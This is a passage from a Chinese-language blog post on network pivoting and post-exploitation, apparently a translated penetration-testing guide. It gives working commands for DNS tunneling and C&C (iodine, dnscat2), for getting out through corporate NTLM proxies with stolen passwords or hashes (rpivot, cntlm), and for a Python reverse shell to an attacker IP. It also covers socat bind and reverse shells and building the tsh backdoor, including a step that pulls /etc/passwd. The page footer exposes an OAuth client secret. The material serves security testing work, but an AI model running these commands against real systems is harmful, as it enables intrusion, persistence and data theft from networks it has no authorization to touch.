<p>现在你可以使用这台机器作为进入内部网络的大门。将本机用作默认网关或连接到管理界面（ssh&#x2F;tsh &#x2F;web shell）。</p>
<h3 id="DNS-隧道"><a href="#DNS-隧道" class="headerlink" title="DNS 隧道"></a>DNS 隧道</h3><p>如果有任何广域网流量被阻塞，但是外部主机名被解析，那么就有可能通过DNS查询来进行隧道通信。你需要注册一个用于此技术工作的域名。<a target="_blank" rel="noopener" href="https://github.com/yarrick/iodine#readme">这个手册</a>可能会帮助你设置你的名称服务器。</p>
<h4 id="Iodine"><a href="#Iodine" class="headerlink" title="Iodine"></a>Iodine</h4><p>如果发生这种情况，并且在服务器上获得了 root 访问权限，你可以试试 <a target="_blank" rel="noopener" href="http://code.kryo.se/iodine/">iodine</a>。它几乎像 hans icmp 隧道工具一样工作 - 它创建了一对 tun 适配器，并将它们之间的数据作为 DNS 查询进行隧道传输。服务器端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com</span><br></pre></td></tr></table></figure>

<p>客户端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iodine -f -P P@ssw0rd tunneldomain.com -r</span><br></pre></td></tr></table></figure>

<p>连接成功将在地址 1.1.1.2 处产生直接的客户端可见性。请注意，这种隧道技术非常慢。你最好的选择是在生成的连接上使用一个压缩的 ssh 连接：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh &lt;user&gt;@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080</span><br></pre></td></tr></table></figure>

<h4 id="Dnscat2"><a href="#Dnscat2" class="headerlink" title="Dnscat2"></a>Dnscat2</h4><p><a target="_blank" rel="noopener" href="https://github.com/iagox86/dnscat2">Dnscat2</a> 通过递归 DNS 查询建立 C＆C 通道。这个工具不需要 root&#x2F;administrator 权限（在 windows 和 linux 上都可以）。它也支持端口转发。服务器端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ruby ./dnscat2.rb tunneldomain.com</span><br></pre></td></tr></table></figure>

<p>客户端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./dnscat2 tunneldomain.com</span><br></pre></td></tr></table></figure>

<p>在收到服务器端的连接后，可以使用 <code>windows</code> 命令查看活动会话：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">dnscat2&gt; windows</span><br><span class="line">0 :: main [active]</span><br><span class="line">  dns1 :: DNS Driver running on 0.0.0.0:53 domains = tunneldomain.com [*]</span><br><span class="line">  1 :: <span class="built_in">command</span> session (debian)</span><br><span class="line">  2 :: sh (debian) [*]</span><br></pre></td></tr></table></figure>

<p>要启动端口转发，请选择带有 <code>session -i &lt;num&gt;</code> 的命令会话：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">dnscat2&gt; session -i 1</span><br><span class="line">New window created: 1</span><br><span class="line">New window created: 1</span><br><span class="line">history_size (session) =&gt; 1000</span><br><span class="line">This is a <span class="built_in">command</span> session!</span><br><span class="line"></span><br><span class="line">That means you can enter a dnscat2 <span class="built_in">command</span> such as</span><br><span class="line"><span class="string">&#x27;ping&#x27;</span>! For a full list of clients, try <span class="string">&#x27;help&#x27;</span>.</span><br><span class="line"></span><br><span class="line"><span class="built_in">command</span> session (debian) 1&gt;</span><br></pre></td></tr></table></figure>

<p>使用 <code>listen [lhost:]lport rhost:rport</code> 命令转发一个端口：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">command</span> session (debian) 1&gt; listen 127.0.0.1:8080 10.0.0.20:80</span><br></pre></td></tr></table></figure>

<p>这将绑定攻击者机器上的 8080 端口，并将所有连接转发到 10.0.0.20:80。</p>
<h3 id="公司的-HTTP-代理作为一种出路"><a href="#公司的-HTTP-代理作为一种出路" class="headerlink" title="公司的 HTTP 代理作为一种出路"></a>公司的 HTTP 代理作为一种出路</h3><p>HTTP 代理组织的地方为他们的员工访问外部网络应用程序提供了一个良好的渗出机会，因为你有正确的凭据;）</p>
<h4 id="使用-Rpivot"><a href="#使用-Rpivot" class="headerlink" title="使用 Rpivot"></a>使用 Rpivot</h4><p>我已经在 NAT 穿越部分提到了这个工具。它还支持通过 NTLM HTTP 代理连接到外部世界。服务器端命令保持不变，使用客户端命令如下：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python client.py --server-ip &lt;rpivot_server_ip&gt; --server-port 9999\</span><br><span class="line">--ntlm-proxy-ip &lt;proxy_ip&gt; --ntlm-proxy-port 8080 --domain CONTOSO.COM\</span><br><span class="line">--username Alice --password P@ssw0rd</span><br></pre></td></tr></table></figure>

<p>或者如果你有 LM:NT 哈希而不是密码：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python client.py --server-ip &lt;rpivot_server_ip&gt;\</span><br><span class="line">--server-port 9999 --ntlm-proxy-ip &lt;proxy_ip&gt; --ntlm-proxy-port 8080 --domain CONTOSO.COM\</span><br><span class="line">--username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45</span><br></pre></td></tr></table></figure>

<h4 id="Cntlm"><a href="#Cntlm" class="headerlink" title="Cntlm"></a>Cntlm</h4><p><a target="_blank" rel="noopener" href="http://cntlm.sourceforge.net/">Cntlm</a> 是通过 NTLM 代理运行任何非代理感知程序的首选工具。基本上这个工具对一个代理进行身份验证，并将本地端口绑定到你指定的外部服务。这个端口绑定不需要任何认证，所以你可以直接使用你的工具（例如 putty&#x2F;ssh）。它使用配置文件进行操作。这里有一个准系统配置的例子来转发端口 443（这个端口是最有可能被允许通过代理的）：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Username Alice</span><br><span class="line">Password P@ssw0rd</span><br><span class="line">Domain CONTOSO.COM</span><br><span class="line">Proxy 10.0.0.10:8080</span><br><span class="line">Tunnel 2222:&lt;attackers_machine&gt;:443</span><br></pre></td></tr></table></figure>

<p>运行：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cntlm.exe -c config.conf</span><br></pre></td></tr></table></figure>

<p>或者如果你在 Linux 上：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./cntlm -c config.conf</span><br></pre></td></tr></table></figure>

<p>现在，假设你已经在远程主机的 443 端口上运行 ssh，你可以启动 ssh 客户端（openssh&#x2F;putty）并连接到本地端口 2222 来访问外部机器。</p>
<h4 id="通过-HTTP-代理的-OpenVpn"><a href="#通过-HTTP-代理的-OpenVpn" class="headerlink" title="通过 HTTP 代理的 OpenVpn"></a>通过 HTTP 代理的 OpenVpn</h4><p><a target="_blank" rel="noopener" href="https://openvpn.net/index.php/open-source/documentation/howto.html">OpenVpn</a> 是巨大的，所以它从头开始的配置超出了这篇文章的范围。只需简单提一下 - 它也支持通过 NTLM 代理的隧道 TCP 连接。将此行添加到你的配置文件中：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http-proxy &lt;proxy_ip&gt; 8080 &lt;file_with_creds&gt; ntlm</span><br></pre></td></tr></table></figure>

<p>凭证文件应该在不同的行上包含用户名和密码。而且，是的，你需要 root。</p>
<h2 id="利用带有-proxychains-的-SOCKS"><a href="#利用带有-proxychains-的-SOCKS" class="headerlink" title="利用带有 proxychains 的 SOCKS"></a>利用带有 proxychains 的 SOCKS</h2><p>如果你的程序不使用原始套接字（例如，nmap syn-scan），那么很可能你可以使用 <code>proxychains</code> 来强制你的程序通过 socks 代理。编辑 &#x2F;etc&#x2F;proxychains.conf 中的代理服务器：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[ProxyList]</span><br><span class="line"><span class="comment"># add proxy here ...</span></span><br><span class="line"><span class="comment"># meanwile</span></span><br><span class="line"><span class="comment"># defaults set to &quot;tor&quot;</span></span><br><span class="line">socks4  127.0.0.1 3128</span><br></pre></td></tr></table></figure>

<p>准备好了，只需在你最喜欢的 pwn 工具上添加 <code>proxychains</code>：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains program_name</span><br></pre></td></tr></table></figure>

<p>与 proxychains 一起使用的 impacket&#39;s psexec.py：</p>
<p><img src="/images/pivoting1.png" alt="proxychains psexec"></p>
<h2 id="DNS-与-proxychains"><a href="#DNS-与-proxychains" class="headerlink" title="DNS 与 proxychains"></a>DNS 与 proxychains</h2><p>Proxychains 在解析主机名时不遵循 socks RFC。它拦截 <code>gethostbyname</code> libc 调用并通过 socks 代理隧道化 tcp DNS 请求。事情是，DNS 服务器硬编码到 <code>4.2.2.2</code>。你可能需要更改名称服务器以解析内部网络上的名称。一个典型的情况是如果你正在测试 Windows 环境，将名称服务器更改为域控制器。该设置位于 <code>/usr/lib/proxychains3/proxyresolv</code>：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"><span class="comment"># This script is called by proxychains to resolve DNS names</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># DNS server used to resolve names</span></span><br><span class="line">DNS_SERVER=<span class="variable">$&#123;PROXYRESOLV_DNS:-4.2.2.2&#125;</span>    <span class="comment">#change nameserver here</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ <span class="variable">$#</span> = 0 ] ; <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;  usage:&quot;</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;      proxyresolv &lt;hostname&gt; &quot;</span></span><br><span class="line">    <span class="built_in">exit</span></span><br><span class="line"><span class="keyword">fi</span></span><br></pre></td></tr></table></figure>

<h2 id="美化你的-web-shell"><a href="#美化你的-web-shell" class="headerlink" title="美化你的 web shell"></a>美化你的 web shell</h2><p>这部分内容与 pivoting 或 tunneling 没有直接关系，而是描述了在内部网络发展攻击时简化工作的方法。通常情况下，使用 web-shell 非常繁琐，特别是在使用需要交互式命令界面的程序时。很可能你会使用一些解决方法来执行简单的任务，比如将密码传递给 sudo&#x2F;su 或者只是编辑一个文件。我不是一个折磨自己的狂热爱好者，所以当有一个机会将 web-shell 升级到一个交互式 shell 时，我这样做:)我不会介绍像使用 bash&#x2F;perl&#x2F;python 等启动半交互式 shell。有很多关于这样做的信息。看看这个反向 shell 备忘单 - <a target="_blank" rel="noopener" href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a> 。</p>
<h3 id="Python-PTY-shell"><a href="#Python-PTY-shell" class="headerlink" title="Python PTY shell"></a>Python PTY shell</h3><p>从常规的半交互式 shell 升级。你可以在现有的 shell 中执行以下命令：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p>或者启动反向连接：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import socket,subprocess,os;\</span></span><br><span class="line"><span class="string">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\</span></span><br><span class="line"><span class="string">s.connect((&quot;&lt;attackers_ip&gt;&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\</span></span><br><span class="line"><span class="string">os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Socat"><a href="#Socat" class="headerlink" title="Socat"></a>Socat</h3><p>Netcat 的加强版！可是说实话，去检查这个<a target="_blank" rel="noopener" href="http://www.dest-unreach.org/socat/">工具</a>的手册 <code>man socat</code>，你会惊奇你可以用这个工具做隧道化的工作。除此之外，它可以产生一个完全交互的 shell，甚至比前面提到的 python-pty 更好。缺点是你很可能将不得不在目标服务器上编译&#x2F;安装这个工具，因为它不是大多数类 Unix 发行版中的默认工具。</p>
<h4 id="绑定-shell"><a href="#绑定-shell" class="headerlink" title="绑定 shell"></a>绑定 shell</h4><p>设置监听器：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane</span><br></pre></td></tr></table></figure>

<p>连接到监听器：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat FILE:`<span class="built_in">tty</span>`,raw,<span class="built_in">echo</span>=0 TCP:&lt;victim_ip&gt;:1337</span><br></pre></td></tr></table></figure>

<h4 id="反向-shell"><a href="#反向-shell" class="headerlink" title="反向 shell"></a>反向 shell</h4><p>设置监听器：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:1337,reuseaddr FILE:`<span class="built_in">tty</span>`,raw,<span class="built_in">echo</span>=0</span><br></pre></td></tr></table></figure>

<p>连接到攻击者的机器：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP4:&lt;attackers_ip&gt;:1337 EXEC:bash,pty,stderr,setsid,sigint,sane</span><br></pre></td></tr></table></figure>

<h4 id="终端大小"><a href="#终端大小" class="headerlink" title="终端大小"></a>终端大小</h4><p>默认情况下，终端的大小是相当小的，当启动 <code>top</code> 命令或使用文本编辑器编辑文件时你可能会注意到。你可以很容易地改变这个，使用 <code>stty -a</code> 命令来获得你的常规终端的大小：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">stty</span> -a</span><br><span class="line">speed 38400 baud; rows 57; columns 211; line = 0;</span><br></pre></td></tr></table></figure>

<p>将所需的尺寸应用到你的 socat 终端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">stty</span> rows 57 cols 211</span><br></pre></td></tr></table></figure>

<h3 id="Tsh"><a href="#Tsh" class="headerlink" title="Tsh"></a>Tsh</h3><p><a target="_blank" rel="noopener" href="https://github.com/creaktive/tsh">Tsh</a> 是一个小型的 ssh 式后门，带有完整的 pty 终端，并具有文件传输能力。这个工具的占用空间非常小，并且很容易在大多数类 Unix 系统上编译。从编辑 tsh.h 文件开始：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">ifndef</span> _TSH_H</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> _TSH_H</span></span><br><span class="line"></span><br><span class="line"><span class="type">char</span> *secret = <span class="string">&quot;never say never say die&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SERVER_PORT 22</span></span><br><span class="line"><span class="type">short</span> <span class="type">int</span> server_port = SERVER_PORT;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">#define CONNECT_BACK_HOST  &quot;localhost&quot;</span></span><br><span class="line"><span class="comment">#define CONNECT_BACK_DELAY 30</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GET_FILE 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PUT_FILE 2</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> RUNSHELL 3</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span> <span class="comment">/* tsh.h */</span></span></span><br></pre></td></tr></table></figure>

<p>更改 <code>secret</code>，指定 <code>SERVER_PORT</code>。如果你想反向连接，取消注释并编辑 <code>CONNECT_BACK_HOST</code> 和 <code>CONNECT_BACK_DELAY</code> 指令。运行 make：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$ make linux_x64</span><br><span class="line">make								\</span><br><span class="line">	LDFLAGS=<span class="string">&quot; -Xlinker --no-as-needed -lutil&quot;</span>	\</span><br><span class="line">	DEFS=<span class="string">&quot; -DLINUX&quot;</span>					\</span><br><span class="line">	tsh tshd</span><br><span class="line">make[1]: Entering directory <span class="string">&#x27;/tmp/tsh&#x27;</span></span><br><span class="line">gcc -O3 -W -Wall -DLINUX -c pel.c</span><br><span class="line">gcc -O3 -W -Wall -DLINUX -c aes.c</span><br><span class="line">gcc -O3 -W -Wall -DLINUX -c sha1.c</span><br><span class="line">gcc -O3 -W -Wall -DLINUX -c tsh.c</span><br><span class="line">gcc -Xlinker --no-as-needed -lutil -o tsh pel.o aes.o sha1.o tsh.o</span><br><span class="line">strip tsh</span><br><span class="line">gcc -O3 -W -Wall -DLINUX -c tshd.c</span><br><span class="line">gcc -Xlinker --no-as-needed -lutil -o tshd pel.o aes.o sha1.o tshd.o</span><br><span class="line">strip tshd</span><br><span class="line">make[1]: Leaving directory <span class="string">&#x27;/tmp/tsh&#x27;</span></span><br></pre></td></tr></table></figure>

<p>现在在服务器上运行 <code>./tshd</code>。它将开始监听指定的端口。您可以通过执行以下命令连接到它：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./tsh host_ip</span><br></pre></td></tr></table></figure>

<p>如果 tsh 被编译有反向连接功能，<code>tshd</code> 守护进程将尝试连接回攻击者的机器。在攻击者侧启动监听：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ./tsh cb</span><br><span class="line">Waiting <span class="keyword">for</span> the server to connect...</span><br></pre></td></tr></table></figure>

<p>用 tsh 传输文件：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./tsh host_ip get /etc/passwd .</span><br><span class="line">./tsh host_ip put /bin/netcat /tmp</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2017/12/05/the-art-of-deception/" rel="prev" title="《欺骗的艺术》读书笔记">
                  <i class="fa fa-angle-left"></i> 《欺骗的艺术》读书笔记
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2017/12/14/cs373-1/" rel="next" title="Udacity CS373：无人驾驶汽车编程学习笔记一">
                  Udacity CS373：无人驾驶汽车编程学习笔记一 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2017 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Howie Zhao</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="Word count total">170k</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.1/dist/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"howiezhao","repo":"howiezhao.github.io","client_id":"c30c41e7faf23130a909","client_secret":"fd907b70c0c5c31bb85d9ef679c47c6887799f0f","admin_user":"howiezhao","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":null,"js":{"url":"https://cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.min.js","integrity":"sha256-MVK9MGD/XJaGyIghSVrONSnoXoGh3IFxLw0zfvzpxR4="},"path_md5":"b785d3ce2a3f0cd1deb0790edd9b5e13"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>
